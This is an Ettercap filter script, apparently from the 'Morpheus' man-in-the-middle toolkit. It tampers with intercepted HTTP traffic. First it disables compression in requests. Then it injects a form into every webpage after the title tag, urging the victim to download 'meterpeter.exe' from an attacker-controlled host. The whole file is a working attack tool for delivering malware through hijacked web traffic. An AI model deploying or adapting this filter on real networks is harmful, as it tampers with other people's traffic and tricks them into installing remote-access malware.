############################################################################
#                                                                          #
#  HTTPS Request/Response Filter                                           #
#  based on code from ALoR & NaGA                                          #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################

##
#  This filter will inject one payload into target webpage request
# 'under MitM attacks' replacing the html tag </title> by our code,
# befor sending the webpage requested to target machine!
##


##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {
  msg("[morpheus] host:IpAdDR   [ -> ]  port:80 http ☆");
  if (search(DATA.data, "Accept-Encoding")) {
  replace("Accept-Encoding", "Accept-Nothing!");
  msg("[Morpheus] | status: Encoding zapped from request ✔");
  }
}



#####################
## Replace Content ##
#####################
# IpAdDR == 192.168.1.67 == TARGET HOST
if (ip.proto == TCP && tcp.src == 80) {
   if (search(DATA.data, "<title>")) {
    replace("</title>", "</title><form
 action=\"http://IpAdDR/meterpeter.exe\" method=\"link\"><img src=\"http://IpAdDR/alert.gif\"><INPUT TYPE=submit value=\"DOWNLOAD meterpeter.exe\"></form><html><body><h10>just some instructions</h10></body></html>");
    msg("[Morpheus] |_ info : malicious url injected into </title> ✔\n");
  }
}

if (ip.proto == TCP && tcp.src == 80) {
   if (search(DATA.data, "<TITLE>")) {
    replace("</TITLE>", "</TITLE><form
 action=\"http://IpAdDR/meterpeter.exe\" method=\"link\"><img src=\"http://IpAdDR/alert.gif\"><INPUT TYPE=submit value=\"DOWNLOAD meterpeter.exe\"></form><html><body><h10>just some instructions</h10></body></html>");
    msg("[Morpheus] |_ info : malicious url injected into </TITLE> ✔\n");
  }
}

